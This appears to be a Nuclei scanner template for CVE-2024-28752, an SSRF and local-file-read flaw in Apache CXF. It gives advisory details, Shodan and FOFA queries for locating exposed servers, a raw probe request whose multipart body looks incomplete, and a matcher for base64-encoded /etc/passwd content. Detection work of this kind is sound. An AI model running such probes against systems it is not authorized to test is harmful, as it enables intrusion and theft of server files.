id: CVE-2024-28752 info: name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read author: maciejklimek severity: high description: | Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources. impact: | An attacker can read arbitrary files from the server and make server-side requests to internal services. remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-28752 - https://github.com/advisories/GHSA-qmgx-j96g-4428 - https://github.com/ReaJason/CVE-2024-28752 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-28752 epss-score: 0.50829 epss-percentile: 0.97906 cwe-id: CWE-918 metadata: verified: true max-request: 1 shodan-query: http.component:"Apache CXF" fofa-query: body="Apache CXF" tags: cve,cve2024,apache,cxf,ssrf,lfi http: - raw: - | POST /test HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/related; boundary=----nucleibound ------nucleibound Content-Disposition: form-data; name="1" ------nucleibound-- matchers-condition: and matchers: - type: word part: body words: - "Unmarshalling Error" - type: regex part: body regex: - "cm9vd[A-Za-z0-9+/=]+" - type: word part: content_type words: - "text/xml" # digest: 4b0a00483046022100ec392f540b133ba79c742edf9dae3cf8c885e03af982707321997b93280082d5022100dd8d99daacbec0c2e5dd7be8106654c0b85e9e9610d9e4bceb201ebf6890c981:922c64590222798bb761d5b6d8e72950